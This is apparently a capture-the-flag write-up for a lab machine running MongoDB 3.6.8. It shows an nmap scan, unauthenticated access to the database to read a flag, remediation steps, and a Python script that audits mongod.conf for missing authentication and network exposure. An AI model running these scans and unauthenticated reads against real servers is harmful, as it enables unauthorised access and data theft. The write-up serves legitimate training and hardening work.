- Machine Name: MonGod
- IP Address: 10.129.60.233
- User: cywf
1. NMAP Scan: I started by running an NMAP scan to identify open ports and services running on the target machine.
$ nmap -p- -T4 -sV 10.129.60.233
Results:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-10 04:10 BST
Nmap scan report for 10.129.60.233
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.42 seconds
2. MongoDB Exploration: After identifying that MongoDB was running on port 27017, I proceeded to connect to it.
First, I installed the MongoDB command-line tools:
curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz
tar xvf mongodb-linux-x86_64-3.4.7.tgz
Then, I connected to the MongoDB server (the mongo shell binary sits in the bin/ directory of the extracted archive, so change into it first):
cd mongodb-linux-x86_64-3.4.7/bin
./mongo mongodb://10.129.60.233:27017
Upon connection, I listed the databases and inspected the sensitive_information database:
> show dbs
> use sensitive_information;
> show collections;
> db.flag.find().pretty();
The MongoDB instance on the target was misconfigured: it accepted connections from the network without requiring any authentication. This allowed me to enumerate the databases and retrieve sensitive information.
Remediation:
- Enable Authentication: Ensure that MongoDB is running with authentication enabled. This can be done by setting the --auth flag when starting the MongoDB server.
- Bind to localhost: If the MongoDB instance is not intended to be accessed externally, bind it to localhost (127.0.0.1).
- Firewall Rules: Implement firewall rules to restrict access to the MongoDB port (27017 by default) only to trusted IP addresses.
- Regularly Update: Ensure that MongoDB is regularly updated to the latest version to benefit from security patches and improvements.
- Monitor Logs: Regularly monitor MongoDB logs for any suspicious activity or unauthorized access attempts.
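As an added example (not part of the original writeup), the following Python script audits a mongod.conf for the two settings that produced this finding: network exposure (net.bindIp / net.bindIpAll) and authentication (security.authorization, the config-file equivalent of starting mongod with --auth). Both configuration texts are constructed for illustration, as are the helper names parse_mongod_conf and audit_mongod_conf; the parser handles only the nested key/value subset of YAML that the shipped mongod.conf uses, so it needs no third-party library.

```python
"""Audit a mongod.conf for the misconfiguration behind the MonGod finding.

Added example, not part of the original writeup. Both sample configs below are
constructed for illustration and the helper names are hypothetical.
"""

# Constructed: a config like the one the target must have run, listening on
# every interface with no security section at all.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0   # reachable from any host
"""

# Constructed: the same server with the first two remediations applied.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled   # config-file equivalent of mongod --auth
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_mongod_conf(text):
    """Parse the nested-mapping subset of YAML that mongod.conf uses.

    Handles indented 'key: value' lines and '#' comments only; that covers the
    shipped mongod.conf but not YAML lists or multi-line values.
    """
    root = {}
    stack = [(-1, root)]  # (indent, mapping) for each open nesting level
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        # Close every level indented at least as deep as this line.
        while indent <= stack[-1][0]:
            stack.pop()
        parent = stack[-1][1]
        if value.strip() == "":
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value.strip().strip("\"'")
    return root


def audit_mongod_conf(conf):
    """Return a list of findings; an empty list means both checks pass."""
    findings = []
    authz = conf.get("security", {}).get("authorization", "disabled")
    if authz != "enabled":
        findings.append(
            "security.authorization is not 'enabled': any client that can reach "
            "the port can read every database without credentials")
    net = conf.get("net", {})
    if str(net.get("bindIpAll", "false")).lower() == "true":
        findings.append("net.bindIpAll is true: mongod listens on every interface")
    # mongod 3.6 and later bind to localhost when bindIp is absent.
    addresses = [a.strip() for a in net.get("bindIp", "127.0.0.1").split(",")]
    exposed = [a for a in addresses if a not in LOOPBACK]
    if exposed:
        findings.append(
            "net.bindIp exposes non-loopback addresses: " + ", ".join(exposed))
    return findings


def audit_conf_text(text):
    """Convenience wrapper: parse the config text, then audit it."""
    return audit_mongod_conf(parse_mongod_conf(text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_conf_text(text)
        print(f"{name}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Run against a real server's /etc/mongod.conf by reading the file into audit_conf_text; the weak sample above yields two findings (no authorization, bound to 0.0.0.0) and the hardened sample yields none. Firewalling port 27017 and reviewing the mongod log remain separate controls that this file-level check does not cover.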